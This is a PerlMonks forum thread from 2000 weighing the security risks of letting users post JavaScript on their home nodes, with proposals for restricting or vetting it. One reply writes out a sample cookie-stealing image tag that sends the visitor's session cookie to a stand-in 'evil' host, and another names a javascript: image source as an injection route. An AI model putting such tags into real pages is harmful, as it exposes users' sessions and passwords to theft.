As of this writing (2000/11/06), our beloved mt2k has a bit of JavaScript that logs people off PM when the user visits his homenode.
While annoying, it's basically harmless. It does, however, reveal a potential security risk. How many of you that have been trapped into visiting the esteemed mt2k's homenode immediately type in your account name and password to log back in, and continue on?
Did you bother to check that you were *really* at www.perlmonks.org, and not at a spoofed login page? Are you sure mt2k hasn't been snagging your password, so he can steal your XP, and sell it on eBay (mostly so he can finally afford a real webhosting service...)?
I'm pretty guilty about running around with JavaScript enabled myself, and I too have been bitten by the mt2k prank. For some reason, I did double check where I wound up, and found it was in a safe place, and not the "mt2k password stealing page".
While I personally would rather not see JavaScript banned from the HTML we can enter ( ar0n used to have some cool stuff on his homenode in JS), this kind of script, and the security risk is the exact sort of thing that I should imagine would cause it to get yanked.
And Dog help the soul that tries to spoof a password page around here, because the retaliation isn't just going to be getting /msg'ed to death, spammed, and nuked, it's going to reporting you to the IRS (if you're American), Interpol for drug trafficking, the UN for warcrimes, and listing you on mt2k's AOL buddy list.
--Chris
e-mail jcwren
RE: On JavaScript, mt2k, and security risks
by Fastolfe (Vicar) on Nov 07, 2000 at 01:57 UTC
|
It's not spoofing we have to worry about. With JavaScript enabled for us, this site is basically *allowing* the "cross-site scripting" vulnerabilities we see reported to BugTraq when people are permitted to execute JavaScript via, say, Hotmail.
In short, all someone has to do is use JavaScript's cookie code to fetch your PerlMonks cookie and deliver it to the malicious user. You don't even have to click a button. Put the JavaScript in an <img src="javascript:do_evil()"> tag, or any of the other dozens of ways of invoking JavaScript, which will neatly circumvent most regexp means of preventing it. The browser has to assume that all code and content coming from a web site is "sanctioned" and approved by that web site, so anything that comes in and tries to muck with the site's cookies or whatever has to be considered legitimately from that site, which means it'll be permitted.
The bottom line: Allowing anybody to put their own content on your web site (such as message boards or sites like this) is a bad idea unless you severely limit what they're allowed to put up. This includes all scripting languages and quite a lot of HTML tags and attributes. As much as I'd hate to see JavaScript go, it's simply not possible to write a secure "parser" that will remove evil JavaScript and permit what's left. | [reply] [d/l] |
RE: On JavaScript, mt2k, and security risks
by vroom (His Eminence) on Nov 07, 2000 at 02:21 UTC
|
I'm all for fun... but annoying other users isn't fun. Also there are a lot of things that people can do with JavaScript. I wish I wouldn't have to make it disappear however it seems inevitable. The more e-mails and /msg's I get from people with the potential dangers of using JavaScript the more I realize that it's going to have to disappear from the site entirely on home nodes as there is no good way of filtering what is good JS and what is bad JS.
I'd like to thank of all of you who wear the white hats and let me know about potential problems, sadly it's inevitable that not all people with wear the white hat.
vroom | Tim Vroom | vroom@cs.hope.edu
| [reply] |
|
Sad, sad day.
Well, silver lining time: Lets add a new toy to replace the old JS one! Here is what I am thinking: PM-code already scans through a node looking for [ and ] and <code> tags and such. Why not start a library of user defined PM tags. These tags would call a predefined function that does something. (This is like a specialized Server side include, which is not the same as the client side JavaScript) This library would be under the direct control of either Vroom or a few high level monks. (Either another clan or just the saints or something.) Anyway, the idea being that when you come up with something cute you would like to have on your node you submit it to the maintainer of the library who then tells you the tag to use. (or not if the idea is rejected.) Other users can then incorporate these new ideas as they choose by using the same tags. And of course, a few data points will be made available to this library (visitor's name, level, and maybe XP for example)
So, an example:
sub SetRandomBGColor
{
my @colorset = qw( aqua white yellow lime );
my $color = $colorset[rand(@colorset)];
print "<style><!-- body { background-color:$color;} --></style>";
}
# This could then be used to do something like:
#
# <PM SetRandomBGColor>
#
| [reply] [d/l] |
RE: On JavaScript, mt2k, and security risks
by Adam (Vicar) on Nov 07, 2000 at 02:09 UTC
|
There are plenty of evil things that users could do, with or without javascript. They don't happen here because we are a friendly community. (I hope). As things currently stand it is rather simple for a user to read (and log) the cookie of every visitor to their homenode. This gives them a bunch of passwords (encrypted) and all the time in the world to run crack on them. You could also cause a person to spend all their votes on your favorite (or least favorite) nodes. Or cause a person to say something stupid in the chatterbox. Etc. But these things are all somewhat limited... how? Community.
Personally, I do not wish to see JavaScript removed from homenodes. I want to see people who abuse the privelage (sp?) banned from the site. I think you should need level 2 or 3 or higher before you can put anything other then <p> on your home node. Ok, maybe they should just be limited to Perl Monks Approved HTML tags. But still, once a person has established themselves as a member of the community their home node should be a place of expression. They should be allowed to do almost anything there (within reason... as defined as non-malicious). | [reply] |
(Ovid) RE: On JavaScript, mt2k, and security risks
by Ovid (Cardinal) on Nov 07, 2000 at 01:59 UTC
|
Okay, now I have a serious problem with JavaScript. I used to think that it was totally innocuous, but consider the following:
- Some new user posts a javascript that kicks you to another node.
- Some new user posts a javascript on the other node that kicks you back to the first one.
As much as I hate to admit it, I'm beginning to think that we should reconsider javascript.
Of course, someone could do the same thing with a refresh <meta> tag. Those aren't allowed any more, are they?
Cheers,
Ovid
Join the Perlmonks Setiathome Group or just go the the link and check out our stats. | [reply] |
|
| [reply] |
|
I've done an automatic PM surfer, that automatically surfs the PM site.
It is good for me, and I need to have it on my home node because of JS security issues
(one isn't allowed to read contents from windows loaded from other sites, which is good).
I usually log out before I use it, making surf around as AnonMonk.
However, if someone uses atomatic JS stunts to do bad stuff to others, I believe in removing the user, not their tool.
/brother t0mas
| [reply] |
|
RE: On JavaScript, mt2k, and security risks
by mdillon (Priest) on Nov 07, 2000 at 02:48 UTC
|
the real JavaScript baddie is crazyinsomniac. he actually
does read your PerlMonks cookie (at least he strips the
password and uses only the usename). currently, all that is
done with it is to display the user's name on the page
(something like "Hi! mdillon!") and add an "invisible" IMG
to the page that is called with the monk's name as a URL
param, but it would be trivial for another user with less
scruples to copy crazyinsomniac's code and use it to grab
an invisible image with the whole cookie as the URL param:
<img width="0" height="0" src="http://i.am/evil/0.gif?cookie=mdillon%05asdf08f98as"> | [reply] [d/l] |
|
just b.t.w., when did you change your password last ? :-))
Have a nice day
All decision is left to your taste
| [reply] |
RE: On JavaScript, mt2k, and security risks
by extremely (Priest) on Nov 07, 2000 at 06:31 UTC
|
| [reply] |
RE: On JavaScript, mt2k, and security risks
by jptxs (Curate) on Nov 07, 2000 at 02:11 UTC
|
Just a small note. I don't know about anyone else, but mt2k's node does bounce me to the login page, but does not log me out...
"sometimes when you make a request for the head you don't
want the big, fat body...don't you go snickering."
-- Nathan Torkington UoP2K a.k.a gnat
| [reply] |
|
The only thing JavaScripty about the node is that it automatically submits a form.
I could write my own form, with a hidden node_id field and a carefully prepared chatterbox message, and do the same thing. Without JavaScript, it's not even as malicious as assume all vroom's godly powers.
| [reply] |
RE: On JavaScript, mt2k, and security risks
by c-era (Curate) on Nov 07, 2000 at 20:26 UTC
|
Maybe we can let javascript be like images with an extra step. First, the user must be level 5 or above. Second, the user must upload the javascript (a .js file). Third, some group of people (like we have for the Q&A) view the javascript and ok it. Finaly, the javascript is embeded in the home node when the page is rendered. Since the javascript is stored on the server side, the javascript can't be changed be the user without submitting the javascript again. | [reply] |
RE: On JavaScript, mt2k, and security risks
by agoth (Chaplain) on Nov 08, 2000 at 18:58 UTC
|
Hmmm,
I didn't mind mt2k's bounce particularly, but I do object to being logged out on j.a.p.h.'s home node, even though the timeout makes it less of a sudden blast of white.
Forced redirection is not one of my favourite things.
| [reply] |
|
|